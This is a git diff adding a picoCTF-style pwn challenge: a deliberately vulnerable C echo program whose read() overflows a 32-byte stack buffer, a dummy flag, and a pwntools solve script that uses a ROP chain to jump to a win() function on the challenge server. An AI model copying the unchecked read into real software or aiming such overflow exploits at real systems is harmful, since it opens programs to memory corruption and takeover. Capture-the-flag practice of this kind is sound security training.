diff --git a/pwn/echo_escape_1/flag.txt b/pwn/echo_escape_1/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/echo_escape_1/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/echo_escape_1/solve.py b/pwn/echo_escape_1/solve.py new file mode 100755 index 0000000..0cf8314 --- /dev/null +++ b/pwn/echo_escape_1/solve.py @@ -0,0 +1,33 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + r.recvuntil(b'Please enter your name: ').decode() + + offset = 0x28 + rop = ROP(exe) + rop.raw(rop.generatePadding(0, offset)) + rop.win() + r.sendline(rop.chain()) + print(r.recvline_contains(b'picoCTF').decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/echo_escape_1/vuln b/pwn/echo_escape_1/vuln new file mode 100755 index 0000000..f648bdc Binary files /dev/null and b/pwn/echo_escape_1/vuln differ diff --git a/pwn/echo_escape_1/vuln.c b/pwn/echo_escape_1/vuln.c new file mode 100644 index 0000000..e5766ba --- /dev/null +++ b/pwn/echo_escape_1/vuln.c @@ -0,0 +1,34 @@ + +#include +#include +#include + +void win() { + FILE *fp = fopen("flag.txt", "rb"); + if (!fp) { + perror("[!] Failed to open flag.txt"); + return; + } + + char buffer[128]; + size_t n = fread(buffer, 1, sizeof(buffer), fp); + fwrite(buffer, 1, n, stdout); + fflush(stdout); + printf("\n"); + fclose(fp); +} + +int main() { + char buf[32]; + + printf("Welcome to the secure echo service!\n"); + printf("Please enter your name: "); + fflush(stdout); + + read(0, buf, 128); + + printf("Hello, %s\n", buf); + printf("Thank you for using our service.\n"); + + return 0; +}